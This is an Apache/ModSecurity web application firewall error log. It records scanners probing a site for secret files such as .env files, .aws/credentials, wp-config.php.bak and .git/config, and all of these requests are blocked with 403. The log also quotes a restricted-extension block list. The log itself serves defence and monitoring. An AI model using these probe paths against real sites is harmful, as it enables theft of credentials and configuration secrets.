[Fri Dec 05 23:02:30.301274 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/local/.env"] [unique_id "aTNWdkr2qd9X944cebQoXwAAAAI"]
[Fri Dec 05 23:02:30.301506 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/local/.env"] [unique_id "aTNWdkr2qd9X944cebQoXwAAAAI"]
[Fri Dec 05 23:02:30.301694 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/local/.env"] [unique_id "aTNWdkr2qd9X944cebQoXwAAAAI"]
[Fri Dec 05 23:02:30.941335 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aTNWdkr2qd9X944cebQoYAAAAAI"]
[Fri Dec 05 23:02:30.941591 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aTNWdkr2qd9X944cebQoYAAAAAI"]
[Fri Dec 05 23:02:30.941815 2025] [:error] [pid 548123] [client 45.148.10.244:44120] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/.env"] [unique_id "aTNWdkr2qd9X944cebQoYAAAAAI"]
[Fri Dec 05 23:02:38.041994 2025] [:error] [pid 547549] [client 45.148.10.244:36774] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/apps/.env"] [unique_id "aTNWfmVdBqmrMm6mFLtGuAAAABA"]
[Fri Dec 05 23:02:38.042234 2025] [:error] [pid 547549] [client 45.148.10.244:36774] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/apps/.env"] [unique_id "aTNWfmVdBqmrMm6mFLtGuAAAABA"]
[Fri Dec 05 23:02:38.042432 2025] [:error] [pid 547549] [client 45.148.10.244:36774] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/apps/.env"] [unique_id "aTNWfmVdBqmrMm6mFLtGuAAAABA"]
[Fri Dec 05 23:02:39.393691 2025] [:error] [pid 547549] [client 45.148.10.244:36774] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aTNWf2VdBqmrMm6mFLtGuQAAABA"]
[Fri Dec 05 23:02:39.394004 2025] [:error] [pid 547549] [client 45.148.10.244:36774] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aTNWf2VdBqmrMm6mFLtGuQAAABA"]
[Fri Dec 05 23:02:39.394271 2025] [:error] [pid 547549] [client 45.148.10.244:36774] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/application/.env"] [unique_id "aTNWf2VdBqmrMm6mFLtGuQAAABA"]
[Fri Dec 05 23:02:39.517261 2025] [:error] [pid 547549] [client 45.148.10.244:36774] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/web/.env"] [unique_id "aTNWf2VdBqmrMm6mFLtGugAAABA"]
[Fri Dec 05 23:02:39.517511 2025] [:error] [pid 547549] [client 45.148.10.244:36774] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/web/.env"] [unique_id "aTNWf2VdBqmrMm6mFLtGugAAABA"]
[Fri Dec 05 23:02:39.517711 2025] [:error] [pid 547549] [client 45.148.10.244:36774] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/web/.env"] [unique_id "aTNWf2VdBqmrMm6mFLtGugAAABA"]
[Fri Dec 05 23:02:39.847072 2025] [:error] [pid 547549] [client 45.148.10.244:36774] [client 45.148.10.244] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aTNWf2VdBqmrMm6mFLtGuwAAABA"]
[Fri Dec 05 23:02:39.847336 2025] [:error] [pid 547549] [client 45.148.10.244:36774] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aTNWf2VdBqmrMm6mFLtGuwAAABA"]
[Fri Dec 05 23:02:39.847526 2025] [:error] [pid 547549] [client 45.148.10.244:36774] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aTNWf2VdBqmrMm6mFLtGuwAAABA"]
[Fri Dec 05 23:02:40.156913 2025] [:error] [pid 547549] [client 45.148.10.244:36774] [client 45.148.10.244] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php.bak"] [unique_id "aTNWgGVdBqmrMm6mFLtGvAAAABA"]
[Fri Dec 05 23:02:40.157048 2025] [:error] [pid 547549] [client 45.148.10.244:36774] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php.bak"] [unique_id "aTNWgGVdBqmrMm6mFLtGvAAAABA"]
[Fri Dec 05 23:02:40.157289 2025] [:error] [pid 547549] [client 45.148.10.244:36774] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php.bak"] [unique_id "aTNWgGVdBqmrMm6mFLtGvAAAABA"]
[Fri Dec 05 23:02:40.157518 2025] [:error] [pid 547549] [client 45.148.10.244:36774] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php.bak"] [unique_id "aTNWgGVdBqmrMm6mFLtGvAAAABA"]
[Sat Dec 06 05:48:55.382065 2025] [authz_core:error] [pid 551924] [client 206.189.95.232:48448] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sat Dec 06 05:48:58.468978 2025] [:error] [pid 551893] [client 206.189.95.232:48496] [client 206.189.95.232] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aTO1upg_mxRYU_c-rc-5aQAAAA0"]
[Sat Dec 06 05:48:58.469234 2025] [:error] [pid 551893] [client 206.189.95.232:48496] [client 206.189.95.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aTO1upg_mxRYU_c-rc-5aQAAAA0"]
[Sat Dec 06 05:48:58.469428 2025] [:error] [pid 551893] [client 206.189.95.232:48496] [client 206.189.95.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "aTO1upg_mxRYU_c-rc-5aQAAAA0"]
[Sat Dec 06 05:48:59.517555 2025] [:error] [pid 551907] [client 206.189.95.232:48498] [client 206.189.95.232] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTO1uwyVmHurXfTWV8mr3gAAAAk"]
[Sat Dec 06 05:48:59.517902 2025] [:error] [pid 551907] [client 206.189.95.232:48498] [client 206.189.95.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTO1uwyVmHurXfTWV8mr3gAAAAk"]
[Sat Dec 06 05:48:59.518129 2025] [:error] [pid 551907] [client 206.189.95.232:48498] [client 206.189.95.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTO1uwyVmHurXfTWV8mr3gAAAAk"]
[Sat Dec 06 05:49:01.534064 2025] [:error] [pid 551557] [client 206.189.95.232:48508] [client 206.189.95.232] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTO1vbsS8kGBs9zQAZmaJwAAAAE"]
[Sat Dec 06 05:49:01.534299 2025] [:error] [pid 551557] [client 206.189.95.232:48508] [client 206.189.95.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTO1vbsS8kGBs9zQAZmaJwAAAAE"]
[Sat Dec 06 05:49:01.534510 2025] [:error] [pid 551557] [client 206.189.95.232:48508] [client 206.189.95.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTO1vbsS8kGBs9zQAZmaJwAAAAE"]
[Sat Dec 06 09:21:37.113624 2025] [:error] [pid 551557] [client 195.178.110.201:25716] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTPnkbsS8kGBs9zQAZmamQAAAAE"], referer: https://www.google.com/
[Sat Dec 06 09:21:37.113990 2025] [:error] [pid 551557] [client 195.178.110.201:25716] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTPnkbsS8kGBs9zQAZmamQAAAAE"], referer: https://www.google.com/
[Sat Dec 06 09:21:37.114184 2025] [:error] [pid 551557] [client 195.178.110.201:25716] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aTPnkbsS8kGBs9zQAZmamQAAAAE"], referer: https://www.google.com/
[Sat Dec 06 09:21:37.479762 2025] [:error] [pid 551557] [client 195.178.110.201:25716] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTPnkbsS8kGBs9zQAZmamgAAAAE"], referer: https://www.google.com/
[Sat Dec 06 09:21:37.480129 2025] [:error] [pid 551557] [client 195.178.110.201:25716] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTPnkbsS8kGBs9zQAZmamgAAAAE"], referer: https://www.google.com/
[Sat Dec 06 09:21:37.480386 2025] [:error] [pid 551557] [client 195.178.110.201:25716] [client 195.178.110.201] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aTPnkbsS8kGBs9zQAZmamgAAAAE"], referer: https://www.google.com/
[Sat Dec 06 09:21:37.714961 2025] [:error] [pid 551557] [client 195.178.110.201:25716] [client 195.178.110.201] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aTPnkbsS8kGBs9zQAZmamwAAAAE"], referer: https://www.google.com/
[Sat Dec 06 09:21:37.715301 2025] [:error] [pid 551557] [client 195.178.110.201:25716] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/backend/.env"] [unique_id "aTPnkbsS8kGBs9zQAZmamwAAAAE"], referer: https://www.google.com/
